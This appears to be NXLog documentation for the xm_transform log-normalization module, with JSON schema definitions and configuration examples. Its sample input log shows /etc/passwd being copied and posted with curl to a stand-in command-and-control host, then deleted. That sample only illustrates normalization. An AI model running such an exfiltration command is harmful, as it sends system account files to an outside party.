Transform (xm_transform)
This module allows normalizing log data according to a specified schema. It accepts file-based schemas in JSON format and supports dynamically setting the schema file.
The module is intended to be used with the JSON (xm_json) extension.
To examine the supported platforms, see the list of installer packages in the Available Modules chapter. |
Schema definition
You must define one or more event schemas in JSON format and save each schema in a separate file. The schema can include constant strings and event fields.
{
"agent_name": "NXLog Agent", (1)
"message": "$raw_event" (2)
}
1 | Sets the agent_name property to NXLog Agent for every log record. |
2 | Sets the message property to the value of the $raw_event core field. |
The schema can also contain nested JSON objects.
For example, the following schema includes a metadata
property containing an object.
{
"message": "$raw_event",
"metadata": {
"agent": {
"name": "NXLog Agent",
"ingestion": "$EventReceivedTime"
}
}
}
See Event records and fields for more information on how NXLog parses log records into fields.
Configuration
The xm_transform module accepts the following directives in addition to the common module directives.
Optional directives
Specify the path to a schema file. NXLog formats log records using this schema when you process them with this extension. |
|||
Use this directive to specify a map of names and the corresponding schema file location. You can use these names when dynamically setting the schema with the set_schema() procedure. See Setting the schema dynamically below for an example.
|
Procedures
The following procedures are exported by xm_transform.
process();
-
This procedure processes the log record and transforms it according to the module instance settings.
Examples
This configuration collects Linux system logs from a file and transforms log records according to a schema file.
<Extension transform>
Module xm_transform
Schema 'schemas/default.json' (1)
</Extension>
<Extension json>
Module xm_json
</Extension>
<Input system_logs>
Module im_file
File '/var/log/syslog'
<Exec>
transform->process(); (2)
to_json(); (3)
</Exec>
</Input>
1 | Defines the path of the schema file. The path is relative to the NXLog configuration folder. |
2 | Normalizes log records according to the schema file defined in the Schema directive. |
3 | Calls the to_json() procedure of xm_json to convert the record to JSON format. |
The following is a basic schema file compatible with log events collected by the im_file input module. This module populates the core fields only.
{
"Event": "$raw_event",
"Metadata": {
"Type": "GENERIC",
"IngestionTime": "$EventReceivedTime"
}
}
2024-09-26 16:05:47 [100]: File "/etc/passwd" 512 bytes was copied to "/tmp/steal.txt".
2024-09-26 16:05:47 [100]: Process 123 "/usr/bin/curl" with command line "-d @/tmp/steal.txt http://example-cc.bot".
2024-09-26 16:05:47 [100]: File "/tmp/steal" 512 bytes was deleted.
{
"Event": "2024-09-26 16:05:47 [100]: File \"/etc/passwd\" 512 bytes was copied to \"/tmp/steal.txt\".",
"Metadata": {
"Type": "GENERIC",
"IngestionTime": "2024-09-26T16:06:00.984034+02:00"
}
}
This configuration collects system and authentication logs from files and transforms log records according to input module instance name: system
or auth
.
<Extension transform>
Module xm_transform
SchemaDir 'schemas/' (1)
<SchemaMap> (2)
system syslog.json
auth authentication.json
</SchemaMap>
</Extension>
<Extension json>
Module xm_json
</Extension>
<Extension syslog>
Module xm_syslog
</Extension>
<Input system>
Module im_file
File '/var/log/syslog'
Exec parse_syslog();
</Input>
<Input auth>
Module im_file
File '/var/log/auth.log'
<Exec>
parse_syslog();
if $Message =~ /^pam_unix\((\S+):session\): session opened for user (\S+) by\ \(uid=(\d+)\)$/
{
$Process = $1
$AccountName = $2;
$AccountID = integer($3);
}
</Exec>
</Input>
<Output file>
Module om_file
File '/tmp/nxlog'
<Exec>
transform->set_schema($SourceModuleName);
transform->process(); (3)
to_json(); (4)
</Exec>
</Output>
1 | Defines the path of the directory containing the schema files. The path is relative to the NXLog configuration folder. |
2 | Maps names to schema files. You use the names when dynamically setting the schema with set_schema(). |
3 | Normalizes log records according to the SchemaMap. |
4 | Calls the to_json() procedure of xm_json to convert the record to JSON format. |